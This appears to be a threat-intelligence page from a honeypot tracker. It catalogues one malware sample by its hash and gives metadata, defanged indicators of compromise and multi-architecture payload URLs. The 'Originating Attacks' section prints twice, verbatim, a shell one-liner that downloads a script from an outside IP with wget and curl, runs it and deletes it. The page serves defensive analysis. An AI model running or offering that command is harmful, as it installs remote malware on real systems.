Back to Malware Drops

b238448228887716df7fd24b8545350de3764afa6b9fc8ee009aa137ee3655ad

MD50ac465a481bad5d2a12c102133dd6c57
SSDEEP
File Typeunknown
Size2.8 KB
Sources2
Downloads0
First SeenJul 25, 2026
Last SeenJul 25, 2026
Download sample (.zip, password: infected)

Live malware — handle only in an isolated analysis environment.

Originating Attacks

Honeypot sessions that dropped this sample. Drop URLs are defanged; commands are shown verbatim and are not links.

  • cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.56.209.70/run.sh; curl -O http://31.56.209.70/run.sh; chmod 777 run.sh; sh run.sh; rm -rf run.sh
    Jul 25, 2026, 9:32:14 PMView attack session
  • cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.56.209.70/run.sh; curl -O http://31.56.209.70/run.sh; chmod 777 run.sh; sh run.sh; rm -rf run.sh
    Jul 25, 2026, 8:50:56 PMView attack session

Indicators of Compromise

Values are defanged (e.g. hxxp://, [.]) — not live links.

ipv4 (1)

  • 31[.]56[.]209[.]70

url (13)

  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnaarch64xnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxni386xnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnloongarch64xnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnm68kxnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnmicroblazexnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnmipsxnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnor1kxnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnpowerpcxnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnriscv32xnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnriscv64xnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnsh2xnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnsh4xnxn;
  • hxxp://31[.]56[.]209[.]70/bins/xnxnxnxnxnxnxnxnx86_64xnxn;